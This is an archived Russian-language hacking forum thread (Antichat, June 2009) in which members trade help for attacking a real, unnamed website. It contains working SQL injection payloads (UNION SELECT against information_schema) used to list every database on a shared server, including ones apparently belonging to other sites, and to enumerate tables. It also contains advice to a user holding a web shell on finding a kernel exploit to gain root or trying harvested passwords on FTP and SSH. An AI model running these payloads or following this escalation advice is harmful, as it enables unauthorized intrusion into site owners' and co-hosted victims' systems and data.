ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.06.2009, 14:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
GOGA075,
...?id=-1+union+select+schema_name+from+information_schema .schemata+limit+x,1
...?id=-1+union+select+group_concat(schema_name)+from+info rmation_schema.schemata
|
|
|
27.06.2009, 14:50
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
RulleR
Спасибо, работает!!!
|
|
|
|
27.06.2009, 14:59
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
вот только у меня 54 БД получилось!!
Так и долдно, или я не туда залез??
|
|
|
|
27.06.2009, 15:12
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от GOGA075
вот только у меня 54 БД получилось!!
Так и долдно, или я не туда залез??
туда, легко может быть и намного больше...
|
|
|
|
27.06.2009, 15:13
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Это БД других сайтов рассположенных на данном сервере??
|
|
|
|
27.06.2009, 15:20
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от GOGA075
Это БД других сайтов рассположенных на данном сервере??
скорее всего так, но могут быть и несколько БД на один сайт
|
|
|
|
27.06.2009, 16:19
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
а как правельно создать запрос на перебор тавлиц к другой БД??
|
|
|
|
27.06.2009, 16:39
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от GOGA075
а как правельно создать запрос на перебор тавлиц к другой БД??
?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables+where+table_schema='имя базы'
|
|
|
|
27.06.2009, 16:37
|
|
Banned
Регистрация: 12.06.2009
Сообщений: 8
Провел на форуме:
26426
Репутация:
1
|
|
имеется шелл на сайте, но права на все файлы стоят 644, ну вообще везде права граматно расставлены, возможно-ли обойти права и изменить содержимое файла на сервере?
|
|
|
|
27.06.2009, 17:06
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от Vish
имеется шелл на сайте, но права на все файлы стоят 644, ну вообще везде права граматно расставлены, возможно-ли обойти права и изменить содержимое файла на сервере?
смотри версию ядра, ищи под неё эксплоит и попробуй порутать, либо ищи пассы разные и пробуй их на ftp, ssh...
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
